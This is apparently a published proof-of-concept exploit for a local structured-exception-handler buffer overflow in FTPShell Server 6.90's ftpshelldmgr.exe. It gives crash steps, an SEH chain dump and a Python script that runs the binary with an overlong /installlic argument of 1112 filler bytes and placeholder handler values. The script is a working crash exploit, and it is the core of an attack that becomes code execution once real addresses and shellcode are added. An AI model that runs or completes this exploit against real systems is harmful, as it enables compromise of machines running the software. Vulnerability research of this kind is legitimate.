# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe)- Buffer Overflow (SEH)(PoC)
# Exploit Author: Saeed reza Zamanian
# Date: 2020-07-01
# Vendor: Code Origin
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadserver.htm
# Version: 6.90 Release Date  : Jan 31, 2020
# 	Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC
# 	Tested On: Windows Vista SP2 -- build 6002 32-bit 
#
# Replicate Crash:
#  1) Download, Install, the application
#  2) Execute the exploit (with administrative permissions)
#  3) Crash with SEH Overwrite
#
# You can also use "/installlic {PAYLOAD}" in arguments field in your debugger (immunity or olly)

# SEH chain of main thread
# Address    SE handler
# 0020FBFC   43434343
# 42424242   *** CORRUPT ENTRY ***


#!/usr/bin/python
import os

directory = 'C:\Program Files\FTPShellServer\\' #default
#directory = 'C:\Program Files (x86)\FTPShellServer\\' #directory_for_x64

offset = '\x41'*1112
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'

payload = offset+nSEH+SEH

try:
    print("[+] Creating %s sending evil payload." %len(payload))
    comm = ('cd '+directory+' && ftpshelldmgr.exe /installlic '+payload)
    stream = os.popen(comm)
    output = stream.read()
    print("[+] payload sent!")
except:
    print("Failed.")